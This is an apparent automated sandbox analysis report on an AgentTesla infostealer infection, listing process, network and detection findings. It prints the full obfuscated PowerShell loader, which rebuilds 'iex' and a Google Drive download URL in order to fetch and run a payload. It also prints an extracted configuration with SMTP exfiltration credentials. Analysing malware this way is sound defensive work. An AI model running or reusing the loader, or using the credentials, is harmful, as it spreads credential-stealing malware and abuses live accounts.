            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$naboiO,onprvQuenteB,llerRedfirDrouge ChamaHjem c redhNe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus detection for URL or domain
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Found malware configuration
            Source: powershell.exe.3428.5.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "smtp.privateemail.com", "Username": "sharon.milton@dasaultfalconjet.com", "Password": "Nigeria@123"}
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C803E0 CryptUnprotectData,11_2_24C803E0
            Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 11_2_24C80A0B CryptUnprotectData,11_2_24C80A0B
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49725 version: TLS 1.2
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb| source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2679909580.000000000776C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb>vkv source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb' source: powershell.exe, 00000005.00000002.2684469813.0000000008830000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.Automation.pdb-2476756634-1003_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32 source: powershell.exe, 00000005.00000002.2679909580.00000000077AD000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000005.00000002.2673226502.0000000003340000.00000004.00000020.00020000.00000000.sdmp

            Software Vulnerabilities

            barindex
            Suspicious execution chain found
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 66.29.159.53:587
            Source: Joe Sandbox ViewIP Address: 66.29.159.53 66.29.159.53
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: unknownDNS query: name: api.ipify.org
            Source: global trafficTCP traffic: 192.168.2.6:49726 -> 66.29.159.53:587
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: drive.google.com
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628591824.000000002421E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
            Source: wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.google.com
            Source: powershell.exe, 00000002.00000002.2754801112.0000015920D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://drive.usercontent.google.com
            Source: powershell.exe, 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628591824.000000002421E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
            Source: powershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2754801112.00000159207C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2673826802.0000000004E51000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://smtp.privateemail.com
            Source: powershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2754801112.00000159207C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: powershell.exe, 00000005.00000002.2673826802.0000000004E51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021F31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.googP
            Source: powershell.exe, 00000002.00000002.2754801112.000001592280A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159209E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
            Source: wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
            Source: wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/j
            Source: wab.exe, 0000000B.00000002.3610795156.0000000006451000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3613683058.0000000006750000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS
            Source: powershell.exe, 00000002.00000002.2754801112.00000159209E8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6P
            Source: powershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6XR
            Source: powershell.exe, 00000002.00000002.2754801112.0000015920D05000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com
            Source: wab.exe, 0000000B.00000003.2671826187.0000000006486000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
            Source: wab.exe, 0000000B.00000003.2671826187.0000000006486000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=download
            Source: wab.exe, 0000000B.00000003.2671826187.0000000006486000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006482000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=downloadq
            Source: wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1JmzHY6tMILZoVaehmxP1a_p6vqCurnrS&export=downloads
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229ED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1r688rMF1EKKwt19kWaHjjLQtOMQJh-e6&export=download
            Source: powershell.exe, 00000005.00000002.2673826802.0000000004FA8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000002.00000002.2754801112.0000015921D1A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 00000002.00000002.2841439577.0000015930831000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2677071576.0000000005EB9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: wab.exe, 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3628322812.000000002418F000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3626677690.000000002203B000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
            Source: powershell.exe, 00000002.00000002.2754801112.00000159229E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.0000015920CFA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2754801112.00000159229C7000.00000004.00000800.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000003.2659019233.0000000006488000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49715 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49716 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49723 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.251.35.161:443 -> 192.168.2.6:49724 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.6:49725 version: TLS 1.2

            Key, Mouse, Clipboard, Microphone and Screen Capturing

            barindex
            Installs a global keyboard hook
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindows user hook set: 0 keyboard low level C:\Program Files (x86)\windows mail\wab.exeJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

            System Summary

            barindex
            Malicious sample detected (through community Yara rule)
            Source: amsi64_416.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: amsi32_3428.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 416, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 3428, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Very long command line found
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7716
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7716
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 7716Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: Commandline size = 7716Jump to behavior
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript starts Powershell (via cmd or directly)
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts 